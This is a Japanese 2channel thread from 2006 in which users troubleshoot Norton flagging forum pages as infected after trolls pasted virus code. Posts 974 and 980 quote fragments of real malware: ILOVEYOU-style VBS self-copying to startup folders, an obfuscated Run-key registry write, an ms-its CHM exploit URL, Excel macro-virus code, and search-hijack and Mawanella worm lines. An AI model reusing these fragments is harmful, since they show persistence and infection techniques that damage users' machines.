どうやって誤検知除外したらいいのでしょうか?
0940動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/27(火) 09:46:13ID:uiyLh7K90
つーか、例の構文貼られても遮断しなくなった。
ノートン側が折れて対応したって事なのか?
0944ベースボール
垢版 |
2006/06/27(火) 23:48:05ID:1VQnoBRk0
ノーd使うころには てめえら死んでんだろ
0945動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/30(金) 05:12:55ID:uE8DR0NH0
⊂二二二( ^ω^)二⊃ブーン
0946動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 17:16:01ID:NsDJ2PXW0
ttp://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
のノートン緊急対策を見て、アドレスに大量のIPアドレスを貼って、これで大丈夫だと思ったら、
芸スポの中田のスレで、またウィルス貼られてるし。
でも前と違って、他のスレは全部すぐ読める。前は30分遮断されたけど。
これは別の種類のなんちゃってウィルスかな?もうどうしたらいいかわからん。
次々といろんなコード貼るから、疲れる・・・
0947動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 22:26:46ID:nhdTqzQc0
さっきから同じファイルばっかり表示して感染してる感染してるってノートンが騒いで
ます。まじめにうざいので黙らせる方法を教えてください。
0949動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 22:40:44ID:nhdTqzQc0
そういえば。この間延長キーを購入したんですが、支払って二週間たっても延長キー
とやらが添付されたメールが届かないんですよ。ウイルスバスターとかも
こんなもんなの?
0950動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 23:27:31ID:p7Wa9d7a0
>>910
すみません。便乗質問になってしまいますが。

最近NAV2004からNIS2006に切り替えたので、>>910 の設定を見かけて
ついでにやっておこうと思ったのですが、
「インターネットワーム防止」と言う項目が見つかりません。
これはNAVパッケージにしかない項目なのでしょうか。
NISの場合は何処を設定すると良いのでしょうか。
0953動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/01(土) 23:56:56ID:p7Wa9d7a0
>>951,952

ありがとうございます。
「インターネットワーム防止」だけで検索していたのでは見つかりませんね。
「NIS」検索で見つかりました。
>>842の方法で、つまりNISでは「インターネットワーム防止」を設定ではなくて、
http://mickey.mirv.net/2chnis.html のIP一覧を追加する、ですね。
0958御法川将貴
垢版 |
2006/07/04(火) 23:58:50ID:b4n0I43F0
名無しさんの助言は 今すぐ立ち去れ
0959御法川将貴
垢版 |
2006/07/05(水) 21:12:56ID:UnaLYAnA0
変態熊本県民が 万引きしたぞー
0960動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/08(土) 10:08:59ID:VMXk0zCF0
ためしにNAVの設定元に戻してみたら
引っかからなくなってるような。(<body onload=w****w()>)
シマンテックが対策した?
NISはもってないからわからんけど。
0963960
垢版 |
2006/07/09(日) 00:04:04ID:1L5D8Za90
vbsウイルスのソースじゃなくて侵入を検出して遮断しました、の
やつだよ。
0966動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/09(日) 09:18:36ID:HhYehN6h0
もう頭悪いからノーdの設定ができない。
自分の常連のスレ片っ端から張られてギコだめだし、
IEで見るようになった。
もう更新やめて別のアンチウィルスソフトにするかな。
それまで我慢してだ。
でもシマンテックの客が減るよな〜。
0967960
垢版 |
2006/07/09(日) 09:34:50ID:1L5D8Za90
>>965
ってか
このスレは侵入を検出して遮断しました用のスレだと思ってた。
vbsウイルスのソースに誤反応、のスレは他にあるし。。
0968960
垢版 |
2006/07/09(日) 09:58:03ID:1L5D8Za90
あ、レス読み違えたスマソ
うちでは何故かnavの設定戻して一度も開いたことないスレのログ取ってみても再現しない。
nav2005です。vbsウイルス用のフォルダ除外の設定はそのまま。
0970960
垢版 |
2006/07/09(日) 14:37:40ID:1L5D8Za90
>>969
>>687以降参照。
NISだけの現象なら始めからこのスレにくることもなかったわけだが。。
0972960
垢版 |
2006/07/09(日) 15:08:39ID:1L5D8Za90
>>971 レスthx
ログビューアみてたらワーム検出の監視ログが変なのに気づいた。

詳細: インターネットワーム保護が 0 個のシグネチャを監視しています。

になってる。全部監視OFF状態になってすり抜けてるだけかも。
確実にインターネットワーム防止をチェックしてるんだけど。。
とりあえずHTTP MSIE JavaScript OnLoad Rte CodeExecのみチェック外した状態なら

詳細: インターネットワーム保護が 568 個のシグネチャを監視しています。

になるようなのでそうしておきます。
0973960
垢版 |
2006/07/09(日) 15:36:17ID:1L5D8Za90
連投すまそ、
いろいろいじっても 0 個のシグネチャを監視していますから変わらなくなってしまった
こんなことに時間割くのは無駄だし更新サービス買うのはやめようと思います・・・orz
0974動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/09(日) 19:43:03ID:xL1TwppA0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
0975動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/11(火) 20:28:47ID:ic76RAqx0
今まで>>974みたいのを専ブラでNGワードに指定していたら、
難なく見ることができていました。
ところが、なぜか今は見られません。
現在も専ブラ上ではアボーソされているのですが、やっぱり見ることができません。
何かあったのでしょうか?
やっぱり誤作動なのでしょうか?

ちなみに今はノートンを無効にしています。
0977動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/12(水) 09:33:42ID:UPljDXSZ0
専ブラは変えてないなら
誤作動する文字列の種類が違うんでしょう。
おおまかに分けると誤反応には現状3種類ある(含シリア語ブラクラ)
0979977
垢版 |
2006/07/12(水) 20:53:52ID:UPljDXSZ0
ごめん、シリア語ブラクラはノートンとは関係ないね。
最近ノートントラップと一緒に貼ってあったりするので混同してしまった。
0980動け動けウゴウゴ2ちゃんねる
垢版 |
2006/07/16(日) 22:37:21ID:ofCNhrjG0
t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm";');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm";');

strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " | --- | |" & vbcrlf
strMsg= strMsg & " | ----- | | | |" & vbcrlf
strMsg= strMsg & " | | | --- | |" & vbcrlf
strMsg= strMsg & " | | | | |" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf


strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."
レス数が950を超えています。1000を超えると書き込みができなくなります。
ニューススポーツなんでも実況